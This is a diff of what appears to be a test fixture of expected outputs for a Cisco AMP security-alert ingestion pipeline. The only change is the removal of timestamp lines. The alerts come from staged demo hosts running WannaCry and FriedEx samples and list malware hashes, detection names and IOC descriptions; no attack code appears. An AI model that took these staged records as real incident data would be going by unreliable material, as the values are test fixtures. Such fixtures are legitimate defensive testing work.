@@ -2305,7 +2277,6 @@ ], "code": "2164260880", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530529128Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2381,7 +2352,6 @@ ], "code": "2164260880", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530530116Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2457,7 +2427,6 @@ ], "code": "2164260880", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530531112Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2531,7 +2500,6 @@ ], "code": "1090519054", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530532099Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2615,7 +2583,6 @@ ], "code": "553648143", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530533094Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2687,7 +2654,6 @@ ], "code": "553648143", "id": "6419179217757405000", - "ingested": "2022-02-02T05:53:29.530534083Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2761,7 +2727,6 @@ ], "code": "1090519054", "id": "6419179213462438000", - "ingested": "2022-02-02T05:53:29.530535245Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -2847,7 +2812,6 @@ ], "code": "1090519054", "id": "6419179213462438000", - "ingested": "2022-02-02T05:53:29.530536262Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -2935,7 +2899,6 @@ ], "code": "553648143", "id": "6419179213462438000", - "ingested": "2022-02-02T05:53:29.530537260Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 
@@ -3009,7 +2972,6 @@ ], "code": "1090519054", "id": "6419179209167471000", - "ingested": "2022-02-02T05:53:29.530538371Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -3099,7 +3061,6 @@ ], "code": "1090519054", "id": "6419179209167471000", - "ingested": "2022-02-02T05:53:29.530539352Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -3189,7 +3150,6 @@ ], "code": "1090519054", "id": "6419179209167471000", - "ingested": "2022-02-02T05:53:29.530540347Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -3283,7 +3243,6 @@ ], "code": "1090519054", "id": "6419179209167471000", - "ingested": "2022-02-02T05:53:29.530541330Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "severity": 2 
@@ -3386,7 +3345,6 @@ ], "code": "1090519105", "id": "6583840597369422000", - "ingested": "2022-02-02T05:53:29.530542321Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", 
"severity": 2 
@@ -3486,7 +3444,6 @@ ], "code": "1107296274", "id": "6701398782847286000", - "ingested": "2022-02-02T05:53:29.530543344Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", "severity": 2, 
@@ -3573,7 +3530,6 @@ ], "code": "1107296274", "id": "7007136036637603000", - "ingested": "2022-02-02T05:53:29.530544324Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", "severity": 2, 
